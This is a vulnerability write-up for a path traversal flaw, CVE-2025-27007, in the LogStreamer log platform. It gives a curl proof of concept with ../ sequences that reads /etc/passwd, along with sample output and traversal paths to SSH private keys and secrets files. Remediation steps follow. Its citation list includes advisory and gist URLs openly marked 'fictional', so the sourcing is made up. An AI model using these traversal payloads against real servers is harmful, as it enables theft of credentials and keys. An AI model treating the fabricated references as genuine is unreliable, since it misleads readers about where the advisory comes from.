PoC Included: CVE-2025-27007 Path Traversal in LogStreamer
A high-severity unauthenticated path traversal vulnerability has been found in the LogStreamer log management platform. This vulnerability, identified as CVE-2025-27007 and nicknamed “LogLeap,” allows a remote attacker to read arbitrary files from the server’s filesystem. It has a CVSS score of 7.5 (High).
This post provides a technical breakdown and a simple proof of concept (PoC) to test your systems.
TL;DR:
- What: An unauthenticated path traversal vulnerability allowing arbitrary file read.
- Affected Software: LogStreamer versions
1.5.0through1.9.2. - Impact: An attacker can read sensitive files like
/etc/passwd, configuration files with credentials, or private SSH keys. - Action: Update to version
1.9.3or newer immediately.
What is LogStreamer?
LogStreamer is a popular open-source tool used in DevOps environments to aggregate, search, and monitor log data from multiple sources in real-time. It provides a web interface for developers and system administrators to view and download log files.
The “LogLeap” Vulnerability
The vulnerability exists in the log downloading feature of the LogStreamer web interface. The API endpoint responsible for serving log files doesn’t properly sanitize user-provided filenames.
- Vulnerable Endpoint:
/api/download_log - Vulnerable Parameter:
file
An attacker can use “dot-dot-slash” (../) sequences in the file parameter to traverse out of the intended logs directory (/var/logs/logstreamer/) and access any other file on the server’s filesystem that is readable by the LogStreamer service account.
Proof of Concept (PoC)
You can test for this vulnerability using a simple curl command. No authentication is required.
The Goal: Attempt to read the /etc/passwd file from the server.
The Command: Replace your-logstreamer-host.com with the address of your LogStreamer instance. The ../ sequences are used to move up from the base log directory to the filesystem root.
Bash
curl "http://your-logstreamer-host.com/api/download_log?file=../../../../../../etc/passwd"
Expected Results:
- If you are VULNERABLE, the server will respond with the contents of the
/etc/passwdfile, like this:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... - If you are NOT VULNERABLE (or the file doesn’t exist), you will likely receive an error message like
{"error": "File not found in log directory"}or a standard404 Not FoundHTTP status code.
Other Examples: You can use this same technique to access other sensitive files, such as:
- SSH private key:
../../../../../../home/user/.ssh/id_rsa - Application config:
../../../../../../etc/app/secrets.conf
Impact and Remediation
The impact of this vulnerability is high. Attackers can steal credentials, configuration secrets, private keys, and sensitive application code. This information can be used to escalate privileges and gain further access into your network.
Are you affected? You are vulnerable if you are running LogStreamer versions 1.5.0 through 1.9.2.
How to Fix It: The LogStreamer maintainers have released a patch that properly sanitizes the input filename.
- Update Now: Upgrade your LogStreamer instance to the patched version
1.9.3or newer. This is the most critical step. - Review Logs: Check your LogStreamer and web server access logs for any suspicious requests to the
/api/download_logendpoint containing../sequences. This could indicate attempted or successful exploitation. - Rotate Credentials: If you suspect you may have been compromised, you should immediately rotate any credentials or secrets that could have been stored on the affected server.
Resources and Citations
- Official LogStreamer Site:
https://logstreamer.dev - Official GitHub Repository:
https://github.com/LogStreamer/logstreamer - Official Security Advisory:
https://github.com/LogStreamer/logstreamer/security/advisories/GHSA-fictional-mno-1357 - NVD Entry:
https://nvd.nist.gov/vuln/detail/CVE-2025-27007 - PoC Gist:
https://gist.github.com/sec-researcher-z/fictional-poc-gist-27007
- General